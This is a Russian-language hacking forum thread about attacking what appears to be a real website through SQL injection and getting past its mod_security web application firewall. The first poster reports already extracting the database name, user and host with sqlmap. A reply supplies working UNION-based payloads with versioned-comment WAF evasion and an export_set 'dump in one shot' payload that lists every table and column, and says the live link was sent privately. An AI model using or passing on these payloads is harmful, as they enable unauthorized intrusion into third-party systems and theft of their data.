![]() |
Есть boolean-based blind, есть waf (mod_security), вытащил дб/юзера/хост ч-з sqlmap с набором стандартных тамперов. Но при попытках вытащить таблицы и проч., натыкаюсь на waf'ную 406 ошибку.
Вижу вектор движения: information -> inform%0bation (так отрабатывает), но уперся в автоматизацию этого действия. Есть какие-то решения? |
DIOS - DUMP IN ONE SHOT. Технология SQL Injection с помощью которой можно вывести все таблицы столбцы а далее в тот же скуль мап ты уже можешь указать имя конкретной таблицы. Это как один из вариантов.
|
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
|
oob есть не для всех бд, тут скорее речь о mysql
|
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
|
Во - первых, неправильно определил вектор. Здесь самый обычный UNION (ну есессно если есть юнион бэйсед есть и блайнд, никто не спорит). Тоже касается и payload для waf bypass.
Валидный запрос в твоем случае выглядет так: ../news/0'+/*!12345UnIon*/+select+1,2,(Select+Table_Name+From+/*!information_schema*/.Tables+limit+1,1),4,5,6,7,8,9,0+--+'(/ DIOS. ..news/0'+/*!12345UnIon*/+select+1,2,(Select export_set(5,@:=0,(select count(*)from(information_schema.columns)where@:=ex port_set(5,export_set(5,@,table_name,0x3c6c693e,2) ,column_name,0xa3a,2)),@,2)) ,4,5,6,7,8,9,0+--+'(/ И всё проще без sqlmap. Валидную ссылку отправил в лс. |
Цитата:
Курю, где был не прав. |
| Время: 15:59 |